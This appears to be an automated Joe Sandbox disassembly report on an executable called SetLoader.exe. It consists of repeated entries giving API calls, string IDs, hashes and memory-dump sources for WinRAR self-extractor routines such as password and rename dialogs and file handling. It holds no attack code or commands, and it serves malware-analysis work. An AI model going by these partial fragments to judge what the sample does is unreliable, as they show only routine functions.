                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _swprintf
                                              • String ID: %ls$%s: %s
                                              • API String ID: 589789837-2259941744
                                              • Opcode ID: 3f81797de217368b4c166abf8faa733d16a0935ba263a6c64e803d973d61de40
                                              • Instruction ID: d1548c27daa852e1ef2fe59d3a46c9b299c9ff24683a93e4ce34904702d564fe
                                              • Opcode Fuzzy Hash: 3f81797de217368b4c166abf8faa733d16a0935ba263a6c64e803d973d61de40
                                              • Instruction Fuzzy Hash: 635149F5248F34FAFA601A84BD02F657677AB05F00F10881AF3867C2D1C7A997416E5B
                                              APIs
                                              • GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 0062D591
                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0062D5B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ItemText
                                              • String ID: GETPASSWORD1$Software\WinRAR SFX
                                              • API String ID: 3367045223-1315819833
                                              • Opcode ID: 214ed87de265b907426c90a7c888b4c9a9f4c741b230a4f367d3715362b5e8cf
                                              • Instruction ID: e6a234403413252ffd2a7f6d89f0294a12bd634d545b501954383914ef703fb1
                                              • Opcode Fuzzy Hash: 214ed87de265b907426c90a7c888b4c9a9f4c741b230a4f367d3715362b5e8cf
                                              • Instruction Fuzzy Hash: D341C0B2904619ABEB30EB64EC45FFE77AEEB49300F104439F609E7181DB70A9448F65
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SetLoader.exe,00000104), ref: 0063A800
                                              • _free.LIBCMT ref: 0063A8CB
                                              • _free.LIBCMT ref: 0063A8D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\SetLoader.exe
                                              • API String ID: 2506810119-365947073
                                              • Opcode ID: a47fa72daa632fd1d8045cdf6219b6f6e9880d30c6a715766bcc2d000831dbec
                                              • Instruction ID: cd4c57c22814559b988602bea1e04206ac9a4ffee01f0e5774d1334300d606f6
                                              • Opcode Fuzzy Hash: a47fa72daa632fd1d8045cdf6219b6f6e9880d30c6a715766bcc2d000831dbec
                                              • Instruction Fuzzy Hash: 8D319E71A00608EFDB25DFD9D8859DEBBFEEB85310F10506AF94897200D6704A42EBE2
                                              APIs
                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0063581B
                                              • _abort.LIBCMT ref: 00635926
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: EncodePointer_abort
                                              • String ID: MOC$RCC
                                              • API String ID: 948111806-2084237596
                                              • Opcode ID: 6f872085bdc0923c58fe75046c22f6aef5b2414f761718a908f79fd631fab164
                                              • Instruction ID: 5abacaf9615f981a409cf0af964004f0b424d5296cd47d617803246befe45a20
                                              • Opcode Fuzzy Hash: 6f872085bdc0923c58fe75046c22f6aef5b2414f761718a908f79fd631fab164
                                              • Instruction Fuzzy Hash: 1A41277190064DEFCF15DF98C881AEEBBB6FF48314F188099FA06A7251D3359960DB94
                                              APIs
                                              • __fprintf_l.LIBCMT ref: 0061F82D
                                              • _strncpy.LIBCMT ref: 0061F871
                                                • Part of subcall function 00623F47: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,006202A0,?,00000000,00000000,?,?,?,006202A0,?,?,00000050), ref: 00623F64
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                              • String ID: $%s$@%s
                                              • API String ID: 562999700-834177443
                                              • Opcode ID: bf8124fb787e44680c2dd80bc13e2fcf436662d6f290bf43037c6bdd7637ae6e
                                              • Instruction ID: 86b156ae002b66f0dd79c727f54fd477e9cd3d7fe4fd1bf0acd1f49ffa85c4db
                                              • Opcode Fuzzy Hash: bf8124fb787e44680c2dd80bc13e2fcf436662d6f290bf43037c6bdd7637ae6e
                                              • Instruction Fuzzy Hash: CC21A1729003099BDB20DFA4DD41FEE77BAFB15700F08052AF92197291E771E945CB55
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0061CAA0,00000008,00000004,0061F1F0,?,00000000), ref: 00622F61
                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0061CAA0,00000008,00000004,0061F1F0,?,00000000), ref: 00622F6B
                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0061CAA0,00000008,00000004,0061F1F0,?,00000000), ref: 00622F7B
                                              Strings
                                              • Thread pool initialization failed., xrefs: 00622F93
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                              • String ID: Thread pool initialization failed.
                                              • API String ID: 3340455307-2182114853
                                              • Opcode ID: 19707f705b22bf678545d3d5c46988fb7e2be530368f3e74206cc5bc4d99f2fb
                                              • Instruction ID: 138f2a406eb5d6ab022cfcc7efacf19c9e737c0a694555f9c6d685bb5c4c1cc1
                                              • Opcode Fuzzy Hash: 19707f705b22bf678545d3d5c46988fb7e2be530368f3e74206cc5bc4d99f2fb
                                              • Instruction Fuzzy Hash: 1B119EB1644B19AFC3215F6ADD849E7FBEEFB96744F10482EF1DAC3200D6B159808B64
                                              APIs
                                                • Part of subcall function 00611366: GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                                • Part of subcall function 00611366: SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0062F9B1
                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0062F9C5
                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0062F9D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ItemText$Window
                                              • String ID: RENAMEDLG
                                              • API String ID: 2802354418-3299779563
                                              • Opcode ID: 9f85439426675b5d16eaef4831aba18106fe4a1e160bd0142fb1da8fd9ed0fb0
                                              • Instruction ID: fe8f5b8c9519381c4a78303ff7742867d32a2a77281aacb0e8f2cd78373d0461
                                              • Opcode Fuzzy Hash: 9f85439426675b5d16eaef4831aba18106fe4a1e160bd0142fb1da8fd9ed0fb0
                                              • Instruction Fuzzy Hash: 3501F532A847207AD3155B24AD09FA7776FFB4A701F104435F245A2290CA629A819B65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                              • API String ID: 0-56093855
                                              • Opcode ID: 452ca4da0d41d664142b31358c6adbc5813a67c9240214f16536a71e293d753e
                                              • Instruction ID: c84ff50046fc4c41a9c37054a8a756dea7152a85033211d0512fbec57456cbb8
                                              • Opcode Fuzzy Hash: 452ca4da0d41d664142b31358c6adbc5813a67c9240214f16536a71e293d753e
                                              • Instruction Fuzzy Hash: 5C01B171604705AFE7158F64EC64EA73BEBFB08791F001025F90593270C2718895DBE0
                                              APIs
                                              • std::_Xinvalid_argument.LIBCPMT ref: 00614B42
                                                • Part of subcall function 0063106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00631079
                                                • Part of subcall function 0063106D: ___delayLoadHelper2@8.DELAYIMP ref: 0063109F
                                              • std::_Xinvalid_argument.LIBCPMT ref: 00614B4D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                              • String ID: string too long$vector too long
                                              • API String ID: 2355824318-1617939282
                                              • Opcode ID: 10ba7fd13c5f4367bdf1cff9bce1f5ba98bccd6b9973e112abccc37e5b03c072
                                              • Instruction ID: 9c4cb47280296f2edd8117136b5be411b9211f2bbd461fc9a4dc1d4e7a8d391b
                                              • Opcode Fuzzy Hash: 10ba7fd13c5f4367bdf1cff9bce1f5ba98bccd6b9973e112abccc37e5b03c072
                                              • Instruction Fuzzy Hash: 46F027312003046B4B346F58DC45C8AB3EFEF85B20B11041AF945C3601CBB0E98087F6
                                              APIs
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00619343,?,?,?), ref: 0061C1EE
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00619343,?,?), ref: 0061C22C
                                              • SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00619343,?,?,?,?,?,?,?,?), ref: 0061C2AF
                                              • CloseHandle.KERNEL32(00000800,?,?,?,00619343,?,?,?,?,?,?,?,?,?,?), ref: 0061C2B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$Create$CloseHandleTime
                                              • String ID:
                                              • API String ID: 2287278272-0
                                              • Opcode ID: 35f0f85d54e24ad4ca57e934e8a72e08fe87bffe2c7293112c6e5b20129239cd
                                              • Instruction ID: 2d6ef20ac1b370eaa69b54bb7edf1abc54af14b87ecce1fba90e38e56b61ef1a
                                              • Opcode Fuzzy Hash: 35f0f85d54e24ad4ca57e934e8a72e08fe87bffe2c7293112c6e5b20129239cd
                                              • Instruction Fuzzy Hash: DC41D631188381AEE320DB64DC56BEFB7EAAF89710F08091DB5D197281D674DA888752
                                              APIs
                                              • _wcslen.LIBCMT ref: 0061BD93
                                              • _wcslen.LIBCMT ref: 0061BDB6
                                              • _wcslen.LIBCMT ref: 0061BE4C
                                              • _wcslen.LIBCMT ref: 0061BEB1
                                                • Part of subcall function 0061C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,006187BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0061C3A5
                                                • Part of subcall function 0061BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 0061BC1C
                                                • Part of subcall function 0061BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 0061BC48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$DirectoryRemove$CloseFind
                                              • String ID:
                                              • API String ID: 973666142-0
                                              • Opcode ID: 64ad89134f8a49273694b1f3fa812ca311341d72fc802c5b0235cd8b640090ee
                                              • Instruction ID: 97b8e3c6e410fbfb7e22f10bcdb85674868a9d3ced57eba0169a179b0cd61b0a
                                              • Opcode Fuzzy Hash: 64ad89134f8a49273694b1f3fa812ca311341d72fc802c5b0235cd8b640090ee
                                              • Instruction Fuzzy Hash: F641E67250439096CB30EB74D8459EBB3EB9F84340F18581EFA8993242EB7499C9CAA5
                                              APIs
                                              • GetLastError.KERNEL32(?,00000000,00000800,?,?,5CB4B331,00000000,?,00000000), ref: 00618596
                                                • Part of subcall function 00618C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00618CB2
                                                • Part of subcall function 00618C95: OpenProcessToken.ADVAPI32(00000000), ref: 00618CB9
                                                • Part of subcall function 00618C95: GetLastError.KERNEL32 ref: 00618CF6
                                                • Part of subcall function 00618C95: CloseHandle.KERNEL32(?), ref: 00618D05
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLastProcess$CloseCurrentHandleOpenToken
                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege$Tc
                                              • API String ID: 3931873934-167178998
                                              • Opcode ID: 1f06a5c7ceb1484bc8e2fe2279e755b9857acb7683793eaf14359ef5116fa851
                                              • Instruction ID: 7dbf57998185b155c5747fb985be266a167569dcf60c0c7d5bb710f43e18831f
                                              • Opcode Fuzzy Hash: 1f06a5c7ceb1484bc8e2fe2279e755b9857acb7683793eaf14359ef5116fa851
                                              • Instruction Fuzzy Hash: 3341BF71A04388AEDF60EF64DC46BEE77BBEF49304F08005DF906A7281DB755E848A65
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00636F64,00000000,00000000,00637F99,?,00637F99,?,00000001,00636F64,?,00000001,00637F99,00637F99), ref: 0063F025
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0063F0AE
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0063F0C0
                                              • __freea.LIBCMT ref: 0063F0C9
                                                • Part of subcall function 0063BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00636A24,?,0000015D,?,?,?,?,00637F00,000000FF,00000000,?,?), ref: 0063BCC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                              • String ID:
                                              • API String ID: 2652629310-0
                                              • Opcode ID: d3115590a24bdad344e3c3f6f1810dcf0f67c1712eca6f28a8fefe43ef8fd501
                                              • Instruction ID: 224ba887451839c8955bd3dacf2689add250134c34258d3c2042b0a95e8a8b90
                                              • Opcode Fuzzy Hash: d3115590a24bdad344e3c3f6f1810dcf0f67c1712eca6f28a8fefe43ef8fd501
                                              • Instruction Fuzzy Hash: 78319D32E0021AABDB289F68DC95DEE7BA6EF45710F044229F804DB251EB35DD54CBE0
                                              APIs
                                              • GetDC.USER32(00000000), ref: 0062C5F6
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0062C605
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0062C613
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0062C621
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: de12387e9d21df4c11c6747191c79b23c5025c559673386c8211b8a991db8751
                                              • Instruction ID: b9541e4acb1dea2145859e5d3485376c136ee1f5cf36f745efd99e1ce6f5d121
                                              • Opcode Fuzzy Hash: de12387e9d21df4c11c6747191c79b23c5025c559673386c8211b8a991db8751
                                              • Instruction Fuzzy Hash: C6E0EC7199AB60ABD3255B60BC2DF9A3B56FB19723F042015F60996290DA704480CFD1
                                              APIs
                                                • Part of subcall function 0062C629: GetDC.USER32(00000000), ref: 0062C62D
                                                • Part of subcall function 0062C629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0062C638
                                                • Part of subcall function 0062C629: ReleaseDC.USER32(00000000,00000000), ref: 0062C643
                                              • GetObjectW.GDI32(?,00000018,?), ref: 0062C7E0
                                                • Part of subcall function 0062CA67: GetDC.USER32(00000000), ref: 0062CA70
                                                • Part of subcall function 0062CA67: GetObjectW.GDI32(?,00000018,?), ref: 0062CA9F
                                                • Part of subcall function 0062CA67: ReleaseDC.USER32(00000000,?), ref: 0062CB37
                                              Similarity
                                              • API ID: ObjectRelease$CapsDevice
                                              • String ID: ($fc
                                              • API String ID: 1061551593-2060305483
                                              • Opcode ID: e51be99fa5c74fc843245fcd0d5e81834e5cd6e1b65c3915edad0f83e6c5e6a8
                                              • Instruction ID: e576193f0aef9495d04f1aaa78c5104265d37c69711daaa09bc4fecfbf4710c8
                                              • Opcode Fuzzy Hash: e51be99fa5c74fc843245fcd0d5e81834e5cd6e1b65c3915edad0f83e6c5e6a8
                                              • Instruction Fuzzy Hash: 6391F275608754AFD710DF29D844A2BBBEAFF89B11F00491EF48AD3260CB70A945CF62
                                              APIs
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: }
                                              • API String ID: 176396367-4239843852
                                              • Opcode ID: 056dfbc78f91dc6ba3cb2e557e05c60e926425bc93a20bb036d523ce38d055f4
                                              • Instruction ID: 7a6c9210d1a0bca109e911c762be80d6748351bb763333fdda571c41a1ba77c4
                                              • Opcode Fuzzy Hash: 056dfbc78f91dc6ba3cb2e557e05c60e926425bc93a20bb036d523ce38d055f4
                                              • Instruction Fuzzy Hash: 78210372904B655AD731EF24E845AABB3EFEF85710F40042EF540C3281EB74D8488BE6
                                              APIs
                                                • Part of subcall function 00611366: GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                                • Part of subcall function 00611366: SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0062CE3D
                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0062CE52
                                              Similarity
                                              • API ID: ItemText$Window
                                              • String ID: ASKNEXTVOL
                                              • API String ID: 2802354418-3402441367
                                              • Opcode ID: 393aea4d06d2d1d87818107a74ea2973a6f6ec4a3dea50d3433d30bc88505a82
                                              • Instruction ID: 7c849c502872ecc726132a25d87145c0b0cd15a8d7ce99e8874933e6ac084a71
                                              • Opcode Fuzzy Hash: 393aea4d06d2d1d87818107a74ea2973a6f6ec4a3dea50d3433d30bc88505a82
                                              • Instruction Fuzzy Hash: E4112C33640A21AFE3119F58EC05FAE3B6BFF4AB50F050054F645AB1A4C7615941DFA5
                                              APIs
                                              • IsWindowVisible.USER32(00010418), ref: 00630210
                                              • DialogBoxParamW.USER32(GETPASSWORD1,00010418,0062D510,?,?), ref: 00630247
                                              Similarity
                                              • API ID: DialogParamVisibleWindow
                                              • String ID: GETPASSWORD1
                                              • API String ID: 3157717868-3292211884
                                              • Opcode ID: d5c9d5f11429e8cd6fab1c5d2977d3700a908fb834a66d898d30c353300f4180
                                              • Instruction ID: 9d56518316de20da0b9a1fbb4eb67cd2e64ae9071a7a8f8eee1fd3de6b63c054
                                              • Opcode Fuzzy Hash: d5c9d5f11429e8cd6fab1c5d2977d3700a908fb834a66d898d30c353300f4180
                                              • Instruction Fuzzy Hash: 8011B7712483806FD360DB64DC66EEBB7DBAB89701F05442DF189D3191CAA46988CBA6
                                              APIs
                                                • Part of subcall function 006212F6: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00621315
                                                • Part of subcall function 006212F6: GetProcAddress.KERNEL32(0065C1F0,CryptUnprotectMemory), ref: 00621325
                                              • GetCurrentProcessId.KERNEL32(?,00000200,?,00621366), ref: 006213F9
                                              Strings
                                              • CryptProtectMemory failed, xrefs: 006213B0
                                              • CryptUnprotectMemory failed, xrefs: 006213F1
                                              Similarity
                                              • API ID: AddressProc$CurrentProcess
                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                              • API String ID: 2190909847-396321323
                                              • Opcode ID: f202f03d8425fc09cd77151403173eefa420128c836777cef31c83f8928baabc
                                              • Instruction ID: 1fec1a8271ed00f0d7c13cc857cfcce71aa2095d5d9efa27121a233ecc9a5c91
                                              • Opcode Fuzzy Hash: f202f03d8425fc09cd77151403173eefa420128c836777cef31c83f8928baabc
                                              • Instruction Fuzzy Hash: A2110A31608B35AFDB25AF20EC009AE3B679F23725B044125FC156F252D7305D818ED5
                                              APIs
                                              • _swprintf.LIBCMT ref: 0061D8D3
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              Similarity
                                              • API ID: __vswprintf_c_l_swprintf
                                              • String ID: %c:\
                                              • API String ID: 1543624204-3142399695
